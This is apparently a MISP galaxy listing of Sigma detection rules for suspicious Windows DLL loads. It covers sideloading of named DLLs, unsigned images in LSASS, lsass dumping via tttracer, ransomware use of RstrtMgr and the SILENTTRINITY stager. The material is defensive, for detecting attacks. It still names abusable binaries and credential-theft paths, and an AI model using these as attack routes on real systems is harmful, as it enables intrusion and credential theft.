UUID 68654bf0-4412-43d5-bfe8-5eaa393cd939 which can be used as unique global reference for Potential DLL Sideloading Via JsSchHlp in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/12/14
falsepositive ['Unknown']
filename image_load_side_load_jsschhlp.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Potential DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE

Detects potential DLL side loading of "KeyScramblerIE.dll" by "KeyScrambler.exe". Various threat actors and malware have been found side loading a masqueraded "KeyScramblerIE.dll" through "KeyScrambler.exe".

Internal MISP references

UUID d2451be2-b582-4e15-8701-4196ac180260 which can be used as unique global reference for Potential DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel
creation_date 2024/04/15
falsepositive ['Unknown']
filename image_load_side_load_keyscrambler.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

System Control Panel Item Loaded From Uncommon Location

Detects image load events of system control panel items (.cpl) from uncommon or non-system locations which might be the result of sideloading.

Internal MISP references

UUID 2b140a5c-dc02-4bb8-b6b1-8bdb45714cde which can be used as unique global reference for System Control Panel Item Loaded From Uncommon Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Anish Bogati
creation_date 2024/01/09
falsepositive ['Unknown']
filename image_load_side_load_cpl_from_non_system_location.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036']
Related clusters

To see the related clusters, click here.

Potential DLL Sideloading Using Coregen.exe

Detect usage of DLL "coregen.exe" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.

Internal MISP references

UUID 0fa66f66-e3f6-4a9c-93f8-4f2610b00171 which can be used as unique global reference for Potential DLL Sideloading Using Coregen.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/12/31
falsepositive ['Unknown']
filename image_load_side_load_coregen.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218', 'attack.t1055']
Related clusters

To see the related clusters, click here.

Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE

Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the "sdiageng.dll" library

Internal MISP references

UUID ec8c4047-fad9-416a-8c81-0f479353d7f6 which can be used as unique global reference for Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Greg (rule)
creation_date 2022/06/17
falsepositive ['Unknown']
filename image_load_dll_sdiageng_load_by_msdt.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1202', 'cve.2022.30190']
Related clusters

To see the related clusters, click here.

Remote DLL Load Via Rundll32.EXE

Detects a remote DLL load event via "rundll32.exe".

Internal MISP references

UUID f40017b3-cb2e-4335-ab5d-3babf679c1de which can be used as unique global reference for Remote DLL Load Via Rundll32.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/09/18
falsepositive ['Unknown']
filename image_load_rundll32_remote_share_load.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.execution', 'attack.t1204.002']
Related clusters

To see the related clusters, click here.

VMMap Signed Dbghelp.DLL Potential Sideloading

Detects potential DLL sideloading of a signed dbghelp.dll by the Sysinternals VMMap.

Internal MISP references

UUID 98ffaed4-aec2-4e04-9b07-31492fe68b3d which can be used as unique global reference for VMMap Signed Dbghelp.DLL Potential Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/09/05
falsepositive ['Unknown']
filename image_load_side_load_vmmap_dbghelp_signed.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Potential System DLL Sideloading From Non System Locations

Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).

Internal MISP references

UUID 4fc0deee-0057-4998-ab31-d24e46e0aba4 which can be used as unique global reference for Potential System DLL Sideloading From Non System Locations in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/14
falsepositive ['Legitimate applications loading their own versions of the DLLs mentioned in this rule']
filename image_load_side_load_from_non_system_location.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Abusable DLL Potential Sideloading From Suspicious Location

Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations

Internal MISP references

UUID 799a5f48-0ac1-4e0f-9152-71d137d48c2a which can be used as unique global reference for Abusable DLL Potential Sideloading From Suspicious Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/07/11
falsepositive ['Unknown']
filename image_load_side_load_abused_dlls_susp_paths.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Suspicious Volume Shadow Copy VSS_PS.dll Load

Detects the image load of vss_ps.dll by uncommon executables

Internal MISP references

UUID 333cdbe8-27bb-4246-bf82-b41a0dca4b70 which can be used as unique global reference for Suspicious Volume Shadow Copy VSS_PS.dll Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis, @markus_neis
creation_date 2021/07/07
falsepositive ['Unknown']
filename image_load_dll_vss_ps_susp_load.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.impact', 'attack.t1490']
Related clusters

To see the related clusters, click here.

Potential CCleanerDU.DLL Sideloading

Detects potential DLL sideloading of "CCleanerDU.dll"

Internal MISP references

UUID 1fbc0671-5596-4e17-8682-f020a0b995dc which can be used as unique global reference for Potential CCleanerDU.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/07/13
falsepositive ['False positives could occur from other custom installation paths. Apply additional filters accordingly.']
filename image_load_side_load_ccleaner_du.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Potential Azure Browser SSO Abuse

Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser. An attacker can use this to authenticate to Azure AD in a browser as that user.

Internal MISP references

UUID 50f852e6-af22-4c78-9ede-42ef36aa3453 which can be used as unique global reference for Potential Azure Browser SSO Abuse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Den Iuzvyk
creation_date 2020/07/15
falsepositive ['False positives are expected since this rules is only looking for the DLL load event. This rule is better used in correlation with related activity']
filename image_load_dll_azure_microsoft_account_token_provider_dll_load.yml
level low
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Aruba Network Service Potential DLL Sideloading

Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking

Internal MISP references

UUID 90ae0469-0cee-4509-b67f-e5efcef040f7 which can be used as unique global reference for Aruba Network Service Potential DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/22
falsepositive ['Unknown']
filename image_load_side_load_aruba_networks_virtual_intranet_access.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.privilege_escalation', 'attack.persistence', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Potential RjvPlatform.DLL Sideloading From Non-Default Location

Detects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location.

Internal MISP references

UUID 0e0bc253-07ed-43f1-816d-e1b220fe8971 which can be used as unique global reference for Potential RjvPlatform.DLL Sideloading From Non-Default Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/06/09
falsepositive ['Unlikely']
filename image_load_side_load_rjvplatform_non_default_location.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

PowerShell Core DLL Loaded By Non PowerShell Process

Detects loading of essential DLLs used by PowerShell by non-PowerShell process. Detects behavior similar to meterpreter's "load powershell" extension.

Internal MISP references

UUID 092bc4b9-3d1d-43b4-a6b4-8c8acd83522f which can be used as unique global reference for PowerShell Core DLL Loaded By Non PowerShell Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2019/11/14
falsepositive ['Used by some .NET binaries, minimal on user workstation.', 'Used by Microsoft SQL Server Management Studio']
filename image_load_dll_system_management_automation_susp_load.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.t1059.001', 'attack.execution']
Related clusters

To see the related clusters, click here.

Load Of RstrtMgr.DLL By An Uncommon Process

Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. It could also be used for anti-analysis purposes by shut downing specific processes.

Internal MISP references

UUID 3669afd2-9891-4534-a626-e5cf03810a61 which can be used as unique global reference for Load Of RstrtMgr.DLL By An Uncommon Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Luc Génaux
creation_date 2023/11/28
falsepositive ['Other legitimate Windows processes not currently listed', 'Processes related to software installation']
filename image_load_dll_rstrtmgr_uncommon_load.yml
level low
logsource.category image_load
logsource.product windows
tags ['attack.impact', 'attack.defense_evasion', 'attack.t1486', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Potential Antivirus Software DLL Sideloading

Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc

Internal MISP references

UUID 552b6b65-df37-4d3e-a258-f2fc4771ae54 which can be used as unique global reference for Potential Antivirus Software DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
creation_date 2022/08/17
falsepositive ['Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused.', "Dell SARemediation plugin folder (C:\Program Files\Dell\SARemediation\plugin\log.dll) is known to contain the 'log.dll' file.", "The Canon MyPrinter folder 'C:\Program Files\Canon\MyPrinter\' is known to contain the 'log.dll' file"]
filename image_load_side_load_antivirus.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

DotNET Assembly DLL Loaded Via Office Application

Detects any assembly DLL being loaded by an Office Product

Internal MISP references

UUID ff0f2b05-09db-4095-b96d-1b75ca24894a which can be used as unique global reference for DotNET Assembly DLL Loaded Via Office Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Antonlovesdnb
creation_date 2020/02/19
falsepositive ['Unknown']
filename image_load_office_dotnet_assembly_dll_load.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.execution', 'attack.t1204.002']
Related clusters

To see the related clusters, click here.

Third Party Software DLL Sideloading

Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)

Internal MISP references

UUID f9df325d-d7bc-4a32-8a1a-2cc61dcefc63 which can be used as unique global reference for Third Party Software DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
creation_date 2022/08/17
falsepositive ['Unknown']
filename image_load_side_load_third_party.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Microsoft Excel Add-In Loaded From Uncommon Location

Detects Microsoft Excel loading an Add-In (.xll) file from an uncommon location

Internal MISP references

UUID af4c4609-5755-42fe-8075-4effb49f5d44 which can be used as unique global reference for Microsoft Excel Add-In Loaded From Uncommon Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/12
falsepositive ['Some tuning might be required to allow or remove certain locations used by the rule if you consider them as safe locations']
filename image_load_office_excel_xll_susp_load.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.execution', 'attack.t1204.002']
Related clusters

To see the related clusters, click here.

Load Of RstrtMgr.DLL By A Suspicious Process

Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. It could also be used for anti-analysis purposes by shut downing specific processes.

Internal MISP references

UUID b48492dc-c5ef-4572-8dff-32bc241c15c8 which can be used as unique global reference for Load Of RstrtMgr.DLL By A Suspicious Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Luc Génaux
creation_date 2023/11/28
falsepositive ['Processes related to software installation']
filename image_load_dll_rstrtmgr_suspicious_load.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.impact', 'attack.defense_evasion', 'attack.t1486', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Potential DLL Sideloading Via VMware Xfer

Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL

Internal MISP references

UUID 9313dc13-d04c-46d8-af4a-a930cc55d93b which can be used as unique global reference for Potential DLL Sideloading Via VMware Xfer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/02
falsepositive ['Unlikely']
filename image_load_side_load_vmware_xfer.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Potential Mfdetours.DLL Sideloading

Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution.

Internal MISP references

UUID d2605a99-2218-4894-8fd3-2afb7946514d which can be used as unique global reference for Potential Mfdetours.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/03
falsepositive ['Unlikely']
filename image_load_side_load_mfdetours.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Python Image Load By Non-Python Process

Detects the image load of "Python Core" by a non-Python process. This might be indicative of a Python script bundled with Py2Exe.

Internal MISP references

UUID cbb56d62-4060-40f7-9466-d8aaf3123f83 which can be used as unique global reference for Python Image Load By Non-Python Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Patrick St. John, OTR (Open Threat Research)
creation_date 2020/05/03
falsepositive ['Legitimate Py2Exe Binaries', 'Known false positive caused with Python Anaconda']
filename image_load_susp_python_image_load.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027.002']
Related clusters

To see the related clusters, click here.

Potential DCOM InternetExplorer.Application DLL Hijack - Image Load

Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class

Internal MISP references

UUID f354eba5-623b-450f-b073-0b5b2773b6aa which can be used as unique global reference for Potential DCOM InternetExplorer.Application DLL Hijack - Image Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga
creation_date 2020/10/12
falsepositive ['Unknown']
filename image_load_iexplore_dcom_iertutil_dll_hijack.yml
level critical
logsource.category image_load
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.002', 'attack.t1021.003']
Related clusters

To see the related clusters, click here.

Suspicious Unsigned Thor Scanner Execution

Detects loading and execution of an unsigned thor scanner binary.

Internal MISP references

UUID ea5c131b-380d-49f9-aeb3-920694da4d4b which can be used as unique global reference for Suspicious Unsigned Thor Scanner Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/10/29
falsepositive ['Other legitimate binaries named "thor.exe" that aren\'t published by Nextron Systems']
filename image_load_thor_unsigned_execution.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Unsigned Image Loaded Into LSASS Process

Loading unsigned image (DLL, EXE) into LSASS process

Internal MISP references

UUID 857c8db3-c89b-42fb-882b-f681c7cf4da2 which can be used as unique global reference for Unsigned Image Loaded Into LSASS Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov, oscd.community
creation_date 2019/10/22
falsepositive ['Valid user connecting using RDP']
filename image_load_lsass_unsigned_image_load.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Potential Waveedit.DLL Sideloading

Detects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software.

Internal MISP references

UUID 71b31e99-9ad0-47d4-aeb5-c0ca3928eeeb which can be used as unique global reference for Potential Waveedit.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/06/14
falsepositive ['Unlikely']
filename image_load_side_load_waveedit.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

DotNet CLR DLL Loaded By Scripting Applications

Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.

Internal MISP references

UUID 4508a70e-97ef-4300-b62b-ff27992990ea which can be used as unique global reference for DotNet CLR DLL Loaded By Scripting Applications in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author omkar72, oscd.community
creation_date 2020/10/14
falsepositive ['Unknown']
filename image_load_susp_script_dotnet_clr_dll_load.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.execution', 'attack.privilege_escalation', 'attack.t1055']
Related clusters

To see the related clusters, click here.

VMMap Unsigned Dbghelp.DLL Potential Sideloading

Detects potential DLL sideloading of an unsigned dbghelp.dll by the Sysinternals VMMap.

Internal MISP references

UUID 273a8dd8-3742-4302-bcc7-7df5a80fe425 which can be used as unique global reference for VMMap Unsigned Dbghelp.DLL Potential Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/07/28
falsepositive ['Unknown']
filename image_load_side_load_vmmap_dbghelp_unsigned.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Potential CCleanerReactivator.DLL Sideloading

Detects potential DLL sideloading of "CCleanerReactivator.dll"

Internal MISP references

UUID 3735d5ac-d770-4da0-99ff-156b180bc600 which can be used as unique global reference for Potential CCleanerReactivator.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior
creation_date 2023/07/13
falsepositive ['False positives could occur from other custom installation paths. Apply additional filters accordingly.']
filename image_load_side_load_ccleaner_reactivator.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Potential WWlib.DLL Sideloading

Detects potential DLL sideloading of "wwlib.dll"

Internal MISP references

UUID e2e01011-5910-4267-9c3b-4149ed5479cf which can be used as unique global reference for Potential WWlib.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/05/18
falsepositive ['Unknown']
filename image_load_side_load_wwlib.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

PCRE.NET Package Image Load

Detects processes loading modules related to PCRE.NET package

Internal MISP references

UUID 84b0a8f3-680b-4096-a45b-e9a89221727c which can be used as unique global reference for PCRE.NET Package Image Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/10/29
falsepositive ['Unknown']
filename image_load_dll_pcre_dotnet_dll_load.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Time Travel Debugging Utility Usage - Image

Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.

Internal MISP references

UUID e76c8240-d68f-4773-8880-5c6f63595aaf which can be used as unique global reference for Time Travel Debugging Utility Usage - Image in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ensar Şamil, @sblmsrsn, @oscd_initiative
creation_date 2020/10/06
falsepositive ['Legitimate usage by software developers/testers']
filename image_load_dll_tttracer_module_load.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.credential_access', 'attack.t1218', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Potential DLL Sideloading Via ClassicExplorer32.dll

Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software

Internal MISP references

UUID caa02837-f659-466f-bca6-48bde2826ab4 which can be used as unique global reference for Potential DLL Sideloading Via ClassicExplorer32.dll in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/12/13
falsepositive ['Unknown']
filename image_load_side_load_classicexplorer32.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Potential DLL Sideloading Of DBGHELP.DLL

Detects DLL sideloading of "dbghelp.dll"

Internal MISP references

UUID 6414b5cd-b19d-447e-bb5e-9f03940b5784 which can be used as unique global reference for Potential DLL Sideloading Of DBGHELP.DLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
creation_date 2022/10/25
falsepositive ['Legitimate applications loading their own versions of the DLL mentioned in this rule']
filename image_load_side_load_dbghelp_dll.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Potential RoboForm.DLL Sideloading

Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager

Internal MISP references

UUID f64c9b2d-b0ad-481d-9d03-7fc75020892a which can be used as unique global reference for Potential RoboForm.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/14
falsepositive ['If installed on a per-user level, the path would be located in "AppData\Local". Add additional filters to reflect this mode of installation']
filename image_load_side_load_robform.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

HackTool - SILENTTRINITY Stager DLL Load

Detects SILENTTRINITY stager dll loading activity

Internal MISP references

UUID 75c505b1-711d-4f68-a357-8c3fe37dbf2d which can be used as unique global reference for HackTool - SILENTTRINITY Stager DLL Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Aleksey Potapov, oscd.community
creation_date 2019/10/22
falsepositive ['Unlikely']
filename image_load_hktl_silenttrinity_stager.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.command_and_control', 'attack.t1071']
Related clusters

To see the related clusters, click here.

Potential Mpclient.DLL Sideloading

Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.

Internal MISP references

UUID 418dc89a-9808-4b87-b1d7-e5ae0cb6effc which can be used as unique global reference for Potential Mpclient.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj
creation_date 2022/08/02
falsepositive ['Unlikely']
filename image_load_side_load_windows_defender.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

DLL Loaded From Suspicious Location Via Cmspt.EXE

Detects cmstp loading "dll" or "ocx" files from suspicious locations

Internal MISP references

UUID 75e508f7-932d-4ebc-af77-269237a84ce1 which can be used as unique global reference for DLL Loaded From Suspicious Location Via Cmspt.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/30
falsepositive ['Unikely']
filename image_load_cmstp_load_dll_from_susp_location.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.003']
Related clusters

To see the related clusters, click here.

Potential Libvlc.DLL Sideloading

Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe"

Internal MISP references

UUID bf9808c4-d24f-44a2-8398-b65227d406b6 which can be used as unique global reference for Potential Libvlc.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior
creation_date 2023/04/17
falsepositive ['False positives are expected if VLC is installed in non-default locations']
filename image_load_side_load_libvlc.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Active Directory Parsing DLL Loaded Via Office Application

Detects DSParse DLL being loaded by an Office Product

Internal MISP references

UUID a2a3b925-7bb0-433b-b508-db9003263cc4 which can be used as unique global reference for Active Directory Parsing DLL Loaded Via Office Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Antonlovesdnb
creation_date 2020/02/19
falsepositive ['Unknown']
filename image_load_office_dsparse_dll_load.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.execution', 'attack.t1204.002']
Related clusters

To see the related clusters, click here.

PowerShell Core DLL Loaded Via Office Application

Detects PowerShell core DLL being loaded by an Office Product

Internal MISP references

UUID bb2ba6fb-95d4-4a25-89fc-30bb736c021a which can be used as unique global reference for PowerShell Core DLL Loaded Via Office Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/01
falsepositive ['Unknown']
filename image_load_office_powershell_dll_load.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion']

Potential SmadHook.DLL Sideloading

Detects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus

Internal MISP references

UUID 24b6cf51-6122-469e-861a-22974e9c1e5b which can be used as unique global reference for Potential SmadHook.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/06/01
falsepositive ['Unlikely']
filename image_load_side_load_smadhook.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

DLL Load By System Process From Suspicious Locations

Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as "C:\Users\Public"

Internal MISP references

UUID 9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c which can be used as unique global reference for DLL Load By System Process From Suspicious Locations in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/17
falsepositive ['Unknown']
filename image_load_susp_dll_load_system_process.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070']
Related clusters

To see the related clusters, click here.

Potential Edputil.DLL Sideloading

Detects potential DLL sideloading of "edputil.dll"

Internal MISP references

UUID e4903324-1a10-4ed3-981b-f6fe3be3a2c2 which can be used as unique global reference for Potential Edputil.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
